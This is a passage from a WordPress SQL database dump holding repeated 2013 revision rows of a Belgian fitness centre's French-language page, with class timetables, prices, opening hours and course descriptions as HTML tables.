alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:29:16', '2013-07-03 16:29:16', '', 11, 'http://www.crosstrainingcenter.be/?p=166', 0, 'revision', '', 0),
(162, 1, '2013-07-03 16:17:49', '2013-07-03 16:17:49', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\n[table caption=\"En semaine\" width=\"700\" colwidth=\"30|50|50|50|50|50\" colalign=\"right|left|left|left|left|left\"]\r\n,Lundi[attr class=\"ttitre\"],Mardi,Mercredi,Jeudi,Vendredi\r\n17h30,TRX,CARDIO,RIP-KETTLE,GLFE,TRX\r\n18h15,GLFE,TRX,CARDIO,RIP-KETTLE,GLFE\r\n19h00,RIP-KETTLE,GLFE,TRX,CARDIO,RIP-KETTLE\r\n19h45,CARDIO,RIP-KETTLE,GLFE,TRX,CARDIO\r\n[/table]\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:17:49', '2013-07-03 16:17:49', '', 11, 'http://www.crosstrainingcenter.be/?p=162', 0, 'revision', '', 0),
(171, 1, '2013-07-03 16:34:43', '2013-07-03 16:34:43', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td >TRX</td>\r\n<td >CARDIO</td>\r\n<td >RIP-KETTLE</td>\r\n<td >GLFE</td>\r\n<td>TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td  class=\"theure\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td  class=\"theure\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong>Le week-end</strong>\r\n<table style=\"border: 1px; width: 30%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Samedi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Dimanche</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">11h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">12h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<strong><span style=\"text-decoration: underline;\">TRX</span> :</strong> entrainement basé sur le poids du corps ! Vous réaliserez des centaines d’exercices qui permettront de développer puissance, force, souplesse, équilibre, mobilité tout en évitant les blessures et avec l\'intensité que vous avez choisie.\r\n\r\n<strong><span style=\"text-decoration: underline;\">Circuit GLFE</span> :</strong> travaillez de manière fun sur un circuit ultra complet, adapté à votre niveau. Relevez des challenges et augmentez votre confiance en vous ! Ce circuit utilise tous les outils.\r\n\r\n<strong><span style=\"text-decoration: underline;\">RIP-KETTLE</span> :</strong> alternance d’exercices avec le Kettlebell (cible les zones inaccessibles avec haltères et charges guidées) et le RIP Trainer (outils issu de la kinésithérapie pour travailler la stabilité de la ceinture abdominale, la coordination,…). Excellent cours pour renforcer, tonifier et raffermir en profondeur votre corps.\r\n\r\n<strong><span style=\"text-decoration: underline;\">CARDIO</span> :</strong> pour développer votre endurance musculaire et cardiovasculaire. Idéal pour brûler un maximum de calories et perdre du poids !', 'Les séances', '', 'inherit', 'open', 'open', '', '11-revision-v1', '', '', '2013-07-03 16:34:43', '2013-07-03 16:34:43', '', 11, 'http://www.crosstrainingcenter.be/?p=171', 0, 'revision', '', 0);
INSERT INTO `www2_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(170, 1, '2013-07-03 16:33:46', '2013-07-03 16:33:46', '<h2>Team Training :</h2>\r\nEntrainements en groupe avec un coach qualifié (8 à 12 personnes).\r\n\r\nEn semaine :\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td class=\"ttitre\"></td>\r\n<td class=\"ttitre\">LUNDI</td>\r\n<td class=\"ttitre\">MARDI</td>\r\n<td class=\"ttitre\">MERCREDI</td>\r\n<td class=\"ttitre\">JEUDI</td>\r\n<td class=\"ttitre\">VENDREDI</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td class=\"theure\">17h30</td>\r\n<td class=\"theure\">TRX</td>\r\n<td class=\"theure\">CARDIO</td>\r\n<td class=\"theure\">RIP-KETTLE</td>\r\n<td class=\"theure\">GLFE</td>\r\n<td class=\"theure\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n\r\n\r\n\r\n\r\n<h2>Nous vous  proposons chaque jour :</h2>\r\n- <strong>Team Training</strong> : entrainements en groupe avec un coach qualifié (8 à 12 pers.)\r\n- <strong>Duo Training</strong> : entrainements à deux personnes sous la supervision d’un coach\r\n- <strong>Personal Training</strong> : un coach par personne, l’idéal pour progresser plus rapidement!\r\n- <strong>Coaching nutritionnel</strong> : rendez-vous avec une diététicienne pour améliorer votre santé\r\n<h2>Prix :</h2>\r\n&nbsp;\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px; border-bottom-style: dotted;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 séance : 9.00€1 carte de 10 séances : 80.00€ (valable 3 mois)\r\n1 carte de 20 séances : 120.00€ (valable 4 mois)\r\nAbonnement 1 mois illimité : 69.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Package alimentation + sport</td>\r\n<td style=\"border: 0px; padding: 5px;\">1 carte de 20 séances + 1 rdv par semaine de coaching alimentaire pendant 3 mois = 235.00€</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Coaching nutritionnel</td>\r\n<td style=\"border: 0px; padding: 5px;\">1er rendez-vous : bilan alimentaire et programme personnalisé : 50.00€Suivi 15,00€</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Horaire :</h2>\r\n<table style=\"border: 0px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 0px; padding: 5px;\">Team Training (réservation obligatoire)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Du Lundi au Vendredi 4 séances : 17h30 – 18h15 – 19h00 – 19h45\r\nSamedi et Dimanche 3 séances : 11h00 – 11h30 – 12h00</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 0px; padding: 5px;\">Personal et Duo Training (sur rendez-vous)</td>\r\n<td style=\"border: 0px; padding: 5px;\">Tous les jours du lundi au dimanche.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h2>Les cours :</h2>\r\n<strong>En semaine</strong>\r\n<table style=\"border: 1px; width: 100%;\">\r\n<tbody>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\"></td>\r\n<td style=\"border: 1px; padding: 5px;\">Lundi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mardi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Mercredi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Jeudi</td>\r\n<td style=\"border: 1px; padding: 5px;\">Vendredi</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">17h30</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">18h15</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n</tr>\r\n<tr style=\"background-color: #fafafa;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h00</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n</tr>\r\n<tr style=\"background-color: #eeeeee;\">\r\n<td style=\"border: 1px; padding: 5px;\">19h45</td>\r\n<td style=\"border: 1px; padding: 5px;\">CARDIO</td>\r\n<td style=\"border: 1px; padding: 5px;\">RIP-KETTLE</td>\r\n<td style=\"border: 1px; padding: 5px;\">GLFE</td>\r\n<td style=\"border: 1px; padding: 5px;\">TRX</td>\r\n<td style=\"border: 